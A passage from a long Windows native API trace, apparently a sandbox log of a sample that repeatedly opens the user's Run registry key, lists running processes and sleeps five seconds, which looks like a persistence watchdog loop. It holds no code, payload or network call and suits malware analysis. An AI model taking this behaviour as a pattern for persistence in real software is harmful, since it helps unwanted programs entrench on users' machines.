ResultLength=0x0) returned 0x0 [0311.264] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x4e0000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0311.265] NtDelayExecution (Alertable=0, Interval=0xdea74*=-50000000) returned 0x0 [0311.268] NtCreateKey (in: KeyHandle=0xdea74, DesiredAccess=0x20219, ObjectAttributes=0xde1e4*(Length=0x18, RootDirectory=0x0, ObjectName="\\Registry\\User\\S-1-5-21-1560258661-3990802383-1811730007-1000\\SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Run", Attributes=0x40, SecurityDescriptor=0x0, SecurityQualityOfService=0x0), TitleIndex=0x0, Class=0x0, CreateOptions=0x0, Disposition=0x0 | out: KeyHandle=0xdea74*=0x378) returned 0x0 [0311.270] NtEnumerateValueKey (in: KeyHandle=0x378, Index=0x0, KeyValueInformationClass=0x1, KeyValueInformation=0xde438, Length=0x200, ResultLength=0xde838 | out: KeyValueInformation=0xde438, ResultLength=0xde838) returned 0x0 [0311.270] NtClose (Handle=0x378) returned 0x0 [0311.270] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea64*=0x0, ZeroBits=0x0, RegionSize=0xdea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea64*=0x4e0000, RegionSize=0xdea68*=0x10000) returned 0x0 [0311.270] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x4e0000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x4e0000, ResultLength=0x0) returned 0xc0000004 [0311.273] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x4e0000, RegionSize=0xdea88, FreeType=0x8000) returned 0x0 [0311.273] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea50*=0x0, ZeroBits=0x0, RegionSize=0xdea54*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea50*=0x4e0000, RegionSize=0xdea54*=0x20000) returned 0x0 [0311.273] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x4e0000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x4e0000, ResultLength=0x0) returned 0x0 [0311.279] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x4e0000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0311.280] NtDelayExecution (Alertable=0, Interval=0xdea74*=-50000000) returned 0x0 [0311.290] NtCreateKey (in: KeyHandle=0xdea74, DesiredAccess=0x20219, ObjectAttributes=0xde1e4*(Length=0x18, RootDirectory=0x0, ObjectName="\\Registry\\User\\S-1-5-21-1560258661-3990802383-1811730007-1000\\SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Run", Attributes=0x40, SecurityDescriptor=0x0, SecurityQualityOfService=0x0), TitleIndex=0x0, Class=0x0, CreateOptions=0x0, Disposition=0x0 | out: KeyHandle=0xdea74*=0x378) returned 0x0 [0311.291] NtEnumerateValueKey (in: KeyHandle=0x378, Index=0x0, KeyValueInformationClass=0x1, KeyValueInformation=0xde438, Length=0x200, ResultLength=0xde838 | out: KeyValueInformation=0xde438, ResultLength=0xde838) returned 0x0 [0311.292] NtClose (Handle=0x378) returned 0x0 [0311.292] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea64*=0x0, ZeroBits=0x0, RegionSize=0xdea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea64*=0x4e0000, RegionSize=0xdea68*=0x10000) returned 0x0 [0311.292] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x4e0000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x4e0000, ResultLength=0x0) returned 0xc0000004 [0311.294] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x4e0000, RegionSize=0xdea88, FreeType=0x8000) returned 0x0 [0311.295] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea50*=0x0, ZeroBits=0x0, RegionSize=0xdea54*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea50*=0x4e0000, RegionSize=0xdea54*=0x20000) returned 0x0 [0311.295] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x4e0000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x4e0000, ResultLength=0x0) returned 0x0 [0311.299] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x4e0000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0311.300] NtDelayExecution (Alertable=0, Interval=0xdea74*=-50000000) returned 0x0 [0311.308] NtCreateKey (in: KeyHandle=0xdea74, DesiredAccess=0x20219, ObjectAttributes=0xde1e4*(Length=0x18, RootDirectory=0x0, ObjectName="\\Registry\\User\\S-1-5-21-1560258661-3990802383-1811730007-1000\\SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Run", Attributes=0x40, SecurityDescriptor=0x0, SecurityQualityOfService=0x0), TitleIndex=0x0, Class=0x0, CreateOptions=0x0, Disposition=0x0 | out: KeyHandle=0xdea74*=0x378) returned 0x0 [0311.309] NtEnumerateValueKey (in: KeyHandle=0x378, Index=0x0, KeyValueInformationClass=0x1, KeyValueInformation=0xde438, Length=0x200, ResultLength=0xde838 | out: KeyValueInformation=0xde438, ResultLength=0xde838) returned 0x0 [0311.309] NtClose (Handle=0x378) returned 0x0 [0311.309] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea64*=0x0, ZeroBits=0x0, RegionSize=0xdea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea64*=0x4e0000, RegionSize=0xdea68*=0x10000) returned 0x0 [0311.309] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x4e0000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x4e0000, ResultLength=0x0) returned 0xc0000004 [0311.314] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x4e0000, RegionSize=0xdea88, FreeType=0x8000) returned 0x0 [0311.314] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea50*=0x0, ZeroBits=0x0, RegionSize=0xdea54*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea50*=0x4e0000, RegionSize=0xdea54*=0x20000) returned 0x0 [0311.314] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x4e0000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x4e0000, ResultLength=0x0) returned 0x0 [0311.319] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x4e0000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0311.319] NtDelayExecution (Alertable=0, Interval=0xdea74*=-50000000) returned 0x0 [0311.323] NtCreateKey (in: KeyHandle=0xdea74, DesiredAccess=0x20219, ObjectAttributes=0xde1e4*(Length=0x18, RootDirectory=0x0, ObjectName="\\Registry\\User\\S-1-5-21-1560258661-3990802383-1811730007-1000\\SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Run", Attributes=0x40, SecurityDescriptor=0x0, SecurityQualityOfService=0x0), TitleIndex=0x0, Class=0x0, CreateOptions=0x0, Disposition=0x0 | out: KeyHandle=0xdea74*=0x378) returned 0x0 [0311.324] NtEnumerateValueKey (in: KeyHandle=0x378, Index=0x0, KeyValueInformationClass=0x1, KeyValueInformation=0xde438, Length=0x200, ResultLength=0xde838 | out: KeyValueInformation=0xde438, ResultLength=0xde838) returned 0x0 [0311.324] NtClose (Handle=0x378) returned 0x0 [0311.324] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea64*=0x0, ZeroBits=0x0, RegionSize=0xdea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea64*=0x4e0000, RegionSize=0xdea68*=0x10000) returned 0x0 [0311.325] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x4e0000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x4e0000, ResultLength=0x0) returned 0xc0000004 [0311.328] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x4e0000, RegionSize=0xdea88, FreeType=0x8000) returned 0x0 [0311.328] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea50*=0x0, ZeroBits=0x0, RegionSize=0xdea54*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea50*=0x4e0000, RegionSize=0xdea54*=0x20000) returned 0x0 [0311.328] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x4e0000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x4e0000, ResultLength=0x0) returned 0x0 [0311.333] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x4e0000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0311.334] NtDelayExecution (Alertable=0, Interval=0xdea74*=-50000000) returned 0x0 [0311.336] NtCreateKey (in: KeyHandle=0xdea74, DesiredAccess=0x20219, ObjectAttributes=0xde1e4*(Length=0x18, RootDirectory=0x0, ObjectName="\\Registry\\User\\S-1-5-21-1560258661-3990802383-1811730007-1000\\SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Run", Attributes=0x40, SecurityDescriptor=0x0, SecurityQualityOfService=0x0), TitleIndex=0x0, Class=0x0, CreateOptions=0x0, Disposition=0x0 | out: KeyHandle=0xdea74*=0x378) returned 0x0 [0311.337] NtEnumerateValueKey (in: KeyHandle=0x378, Index=0x0, KeyValueInformationClass=0x1, KeyValueInformation=0xde438, Length=0x200, ResultLength=0xde838 | out: KeyValueInformation=0xde438, ResultLength=0xde838) returned 0x0 [0311.337] NtClose (Handle=0x378) returned 0x0 [0311.337] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea64*=0x0, ZeroBits=0x0, RegionSize=0xdea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea64*=0x4e0000, RegionSize=0xdea68*=0x10000) returned 0x0 [0311.337] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x4e0000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x4e0000, ResultLength=0x0) returned 0xc0000004 [0311.339] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x4e0000, RegionSize=0xdea88, FreeType=0x8000) returned 0x0 [0311.340] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea50*=0x0, ZeroBits=0x0, RegionSize=0xdea54*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea50*=0x4e0000, RegionSize=0xdea54*=0x20000) returned 0x0 [0311.341] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x4e0000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x4e0000, ResultLength=0x0) returned 0x0 [0311.346] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x4e0000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0311.347] NtDelayExecution (Alertable=0, Interval=0xdea74*=-50000000) returned 0x0 [0311.352] NtCreateKey (in: KeyHandle=0xdea74, DesiredAccess=0x20219, ObjectAttributes=0xde1e4*(Length=0x18, RootDirectory=0x0, ObjectName="\\Registry\\User\\S-1-5-21-1560258661-3990802383-1811730007-1000\\SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Run", Attributes=0x40, SecurityDescriptor=0x0, SecurityQualityOfService=0x0), TitleIndex=0x0, Class=0x0, CreateOptions=0x0, Disposition=0x0 | out: KeyHandle=0xdea74*=0x378) returned 0x0 [0311.353] NtEnumerateValueKey (in: KeyHandle=0x378, Index=0x0, KeyValueInformationClass=0x1, KeyValueInformation=0xde438, Length=0x200, ResultLength=0xde838 | out: KeyValueInformation=0xde438, ResultLength=0xde838) returned 0x0 [0311.353] NtClose (Handle=0x378) returned 0x0 [0311.353] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea64*=0x0, ZeroBits=0x0, RegionSize=0xdea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea64*=0x4e0000, RegionSize=0xdea68*=0x10000) returned 0x0 [0311.354] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x4e0000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x4e0000, ResultLength=0x0) returned 0xc0000004 [0311.364] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x4e0000, RegionSize=0xdea88, FreeType=0x8000) returned 0x0 [0311.364] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea50*=0x0, ZeroBits=0x0, RegionSize=0xdea54*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea50*=0x4e0000, RegionSize=0xdea54*=0x20000) returned 0x0 [0311.365] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x4e0000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x4e0000, ResultLength=0x0) returned 0x0 [0311.402] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x4e0000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0311.403] NtDelayExecution (Alertable=0, Interval=0xdea74*=-50000000) returned 0x0 [0311.408] NtCreateKey (in: KeyHandle=0xdea74, DesiredAccess=0x20219, ObjectAttributes=0xde1e4*(Length=0x18, RootDirectory=0x0, ObjectName="\\Registry\\User\\S-1-5-21-1560258661-3990802383-1811730007-1000\\SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Run", Attributes=0x40, SecurityDescriptor=0x0, SecurityQualityOfService=0x0), TitleIndex=0x0, Class=0x0, CreateOptions=0x0, Disposition=0x0 | out: KeyHandle=0xdea74*=0x378) returned 0x0 [0311.409] NtEnumerateValueKey (in: KeyHandle=0x378, Index=0x0, KeyValueInformationClass=0x1, KeyValueInformation=0xde438, Length=0x200, ResultLength=0xde838 | out: KeyValueInformation=0xde438, ResultLength=0xde838) returned 0x0 [0311.409] NtClose (Handle=0x378) returned 0x0 [0311.409] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea64*=0x0, ZeroBits=0x0, RegionSize=0xdea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea64*=0x4e0000, RegionSize=0xdea68*=0x10000) returned 0x0 [0311.410] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x4e0000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x4e0000, ResultLength=0x0) returned 0xc0000004 [0311.412] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x4e0000, RegionSize=0xdea88, FreeType=0x8000) returned 0x0 [0311.412] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea50*=0x0, ZeroBits=0x0, RegionSize=0xdea54*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea50*=0x4e0000, RegionSize=0xdea54*=0x20000) returned 0x0 [0311.412] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x4e0000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x4e0000, ResultLength=0x0) returned 0x0 [0311.418] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x4e0000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0311.419] NtDelayExecution (Alertable=0, Interval=0xdea74*=-50000000) returned 0x0 [0311.426] NtCreateKey (in: KeyHandle=0xdea74, DesiredAccess=0x20219, ObjectAttributes=0xde1e4*(Length=0x18, RootDirectory=0x0, ObjectName="\\Registry\\User\\S-1-5-21-1560258661-3990802383-1811730007-1000\\SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Run", Attributes=0x40, SecurityDescriptor=0x0, SecurityQualityOfService=0x0), TitleIndex=0x0, Class=0x0, CreateOptions=0x0, Disposition=0x0 | out: KeyHandle=0xdea74*=0x378) returned 0x0 [0311.428] NtEnumerateValueKey (in: KeyHandle=0x378, Index=0x0, KeyValueInformationClass=0x1, KeyValueInformation=0xde438, Length=0x200, ResultLength=0xde838 | out: KeyValueInformation=0xde438, ResultLength=0xde838) returned 0x0 [0311.428] NtClose (Handle=0x378) returned 0x0 [0311.428] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea64*=0x0, ZeroBits=0x0, RegionSize=0xdea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea64*=0x4e0000, RegionSize=0xdea68*=0x10000) returned 0x0 [0311.429] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x4e0000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x4e0000, ResultLength=0x0) returned 0xc0000004 [0311.447] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x4e0000, RegionSize=0xdea88, FreeType=0x8000) returned 0x0 [0311.448] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea50*=0x0, ZeroBits=0x0, RegionSize=0xdea54*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea50*=0x4e0000, RegionSize=0xdea54*=0x20000) returned 0x0 [0311.448] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x4e0000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x4e0000, ResultLength=0x0) returned 0x0 [0311.455] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x4e0000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0311.456] NtDelayExecution (Alertable=0, Interval=0xdea74*=-50000000) returned 0x0 [0311.469] NtCreateKey (in: KeyHandle=0xdea74, DesiredAccess=0x20219, ObjectAttributes=0xde1e4*(Length=0x18, RootDirectory=0x0, ObjectName="\\Registry\\User\\S-1-5-21-1560258661-3990802383-1811730007-1000\\SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Run", Attributes=0x40, SecurityDescriptor=0x0, SecurityQualityOfService=0x0), TitleIndex=0x0, Class=0x0, CreateOptions=0x0, Disposition=0x0 | out: KeyHandle=0xdea74*=0x378) returned 0x0 [0311.470] NtEnumerateValueKey (in: KeyHandle=0x378, Index=0x0, KeyValueInformationClass=0x1, KeyValueInformation=0xde438, Length=0x200, ResultLength=0xde838 | out: KeyValueInformation=0xde438, ResultLength=0xde838) returned 0x0 [0311.470] NtClose (Handle=0x378) returned 0x0 [0311.470] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea64*=0x0, ZeroBits=0x0, RegionSize=0xdea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea64*=0x4e0000, RegionSize=0xdea68*=0x10000) returned 0x0 [0311.470] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x4e0000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x4e0000, ResultLength=0x0) returned 0xc0000004 [0311.473] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x4e0000, RegionSize=0xdea88, FreeType=0x8000) returned 0x0 [0311.474] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea50*=0x0, ZeroBits=0x0, RegionSize=0xdea54*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea50*=0x4e0000, RegionSize=0xdea54*=0x20000) returned 0x0 [0311.474] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x4e0000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x4e0000, ResultLength=0x0) returned 0x0 [0311.523] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x4e0000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0311.524] NtDelayExecution (Alertable=0, Interval=0xdea74*=-50000000) returned 0x0 [0311.532] NtCreateKey (in: KeyHandle=0xdea74, DesiredAccess=0x20219, ObjectAttributes=0xde1e4*(Length=0x18, RootDirectory=0x0, ObjectName="\\Registry\\User\\S-1-5-21-1560258661-3990802383-1811730007-1000\\SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Run", Attributes=0x40, SecurityDescriptor=0x0, SecurityQualityOfService=0x0), TitleIndex=0x0, Class=0x0, CreateOptions=0x0, Disposition=0x0 | out: KeyHandle=0xdea74*=0x378) returned 0x0 [0311.534] NtEnumerateValueKey (in: KeyHandle=0x378, Index=0x0, KeyValueInformationClass=0x1, KeyValueInformation=0xde438, Length=0x200, ResultLength=0xde838 | out: KeyValueInformation=0xde438, ResultLength=0xde838) returned 0x0 [0311.534] NtClose (Handle=0x378) returned 0x0 [0311.534] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea64*=0x0, ZeroBits=0x0, RegionSize=0xdea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea64*=0x4e0000, RegionSize=0xdea68*=0x10000) returned 0x0 [0311.534] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x4e0000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x4e0000, ResultLength=0x0) returned 0xc0000004 [0311.536] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x4e0000, RegionSize=0xdea88, FreeType=0x8000) returned 0x0 [0311.537] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea50*=0x0, ZeroBits=0x0, RegionSize=0xdea54*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea50*=0x4e0000, RegionSize=0xdea54*=0x20000) returned 0x0 [0311.537] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x4e0000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x4e0000, ResultLength=0x0) returned 0x0 [0311.542] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x4e0000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0311.542] NtDelayExecution (Alertable=0, Interval=0xdea74*=-50000000) returned 0x0 [0311.546] NtCreateKey (in: KeyHandle=0xdea74, DesiredAccess=0x20219, ObjectAttributes=0xde1e4*(Length=0x18, RootDirectory=0x0, ObjectName="\\Registry\\User\\S-1-5-21-1560258661-3990802383-1811730007-1000\\SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Run", Attributes=0x40, SecurityDescriptor=0x0, SecurityQualityOfService=0x0), TitleIndex=0x0, Class=0x0, CreateOptions=0x0, Disposition=0x0 | out: KeyHandle=0xdea74*=0x378) returned 0x0 [0311.547] NtEnumerateValueKey (in: KeyHandle=0x378, Index=0x0, KeyValueInformationClass=0x1, KeyValueInformation=0xde438, Length=0x200, ResultLength=0xde838 | out: KeyValueInformation=0xde438, ResultLength=0xde838) returned 0x0 [0311.548] NtClose (Handle=0x378) returned 0x0 [0311.548] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea64*=0x0, ZeroBits=0x0, RegionSize=0xdea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea64*=0x4e0000, RegionSize=0xdea68*=0x10000) returned 0x0 [0311.548] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x4e0000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x4e0000, ResultLength=0x0) returned 0xc0000004 [0311.550] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x4e0000, RegionSize=0xdea88, FreeType=0x8000) returned 0x0 [0311.551] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea50*=0x0, ZeroBits=0x0, RegionSize=0xdea54*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea50*=0x4e0000, RegionSize=0xdea54*=0x20000) returned 0x0 [0311.551] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x4e0000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x4e0000, ResultLength=0x0) returned 0x0 [0311.556] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x4e0000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0311.556] NtDelayExecution (Alertable=0, Interval=0xdea74*=-50000000) returned 0x0 [0311.616] NtCreateKey (in: KeyHandle=0xdea74, DesiredAccess=0x20219, ObjectAttributes=0xde1e4*(Length=0x18, RootDirectory=0x0, ObjectName="\\Registry\\User\\S-1-5-21-1560258661-3990802383-1811730007-1000\\SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Run", Attributes=0x40, SecurityDescriptor=0x0, SecurityQualityOfService=0x0), TitleIndex=0x0, Class=0x0, CreateOptions=0x0, Disposition=0x0 | out: KeyHandle=0xdea74*=0x378) returned 0x0 [0311.617] NtEnumerateValueKey (in: KeyHandle=0x378, Index=0x0, KeyValueInformationClass=0x1, KeyValueInformation=0xde438, Length=0x200, ResultLength=0xde838 | out: KeyValueInformation=0xde438, ResultLength=0xde838) returned 0x0 [0311.618] NtClose (Handle=0x378) returned 0x0 [0311.618] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea64*=0x0, ZeroBits=0x0, RegionSize=0xdea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea64*=0x4e0000, RegionSize=0xdea68*=0x10000) returned 0x0 [0311.618] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x4e0000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x4e0000, ResultLength=0x0) returned 0xc0000004 [0311.620] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x4e0000, RegionSize=0xdea88, FreeType=0x8000) returned 0x0 [0311.621] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea50*=0x0, ZeroBits=0x0, RegionSize=0xdea54*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea50*=0x4e0000, RegionSize=0xdea54*=0x20000) returned 0x0 [0311.621] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x4e0000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x4e0000, ResultLength=0x0) returned 0x0 [0311.640] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x4e0000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0311.641] NtDelayExecution (Alertable=0, Interval=0xdea74*=-50000000) returned 0x0 [0311.713] NtCreateKey (in: KeyHandle=0xdea74, DesiredAccess=0x20219, ObjectAttributes=0xde1e4*(Length=0x18, RootDirectory=0x0, ObjectName="\\Registry\\User\\S-1-5-21-1560258661-3990802383-1811730007-1000\\SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Run", Attributes=0x40, SecurityDescriptor=0x0, SecurityQualityOfService=0x0), TitleIndex=0x0, Class=0x0, CreateOptions=0x0, Disposition=0x0 | out: KeyHandle=0xdea74*=0x378) returned 0x0 [0311.715] NtEnumerateValueKey (in: KeyHandle=0x378, Index=0x0, KeyValueInformationClass=0x1, KeyValueInformation=0xde438, Length=0x200, ResultLength=0xde838 | out: KeyValueInformation=0xde438, ResultLength=0xde838) returned 0x0 [0311.715] NtClose (Handle=0x378) returned 0x0 [0311.715] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea64*=0x0, ZeroBits=0x0, RegionSize=0xdea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea64*=0x4e0000, RegionSize=0xdea68*=0x10000) returned 0x0 [0311.715] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x4e0000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x4e0000, ResultLength=0x0) returned 0xc0000004 [0311.719] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x4e0000, RegionSize=0xdea88, FreeType=0x8000) returned 0x0 [0311.719] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea50*=0x0, ZeroBits=0x0, RegionSize=0xdea54*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea50*=0x4e0000, RegionSize=0xdea54*=0x20000) returned 0x0 [0311.719] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x4e0000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x4e0000, ResultLength=0x0) returned 0x0 [0311.726] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x4e0000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0311.727] NtDelayExecution (Alertable=0, Interval=0xdea74*=-50000000) returned 0x0 [0311.731] NtCreateKey (in: KeyHandle=0xdea74, DesiredAccess=0x20219, ObjectAttributes=0xde1e4*(Length=0x18, RootDirectory=0x0, ObjectName="\\Registry\\User\\S-1-5-21-1560258661-3990802383-1811730007-1000\\SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Run", Attributes=0x40, SecurityDescriptor=0x0, SecurityQualityOfService=0x0), 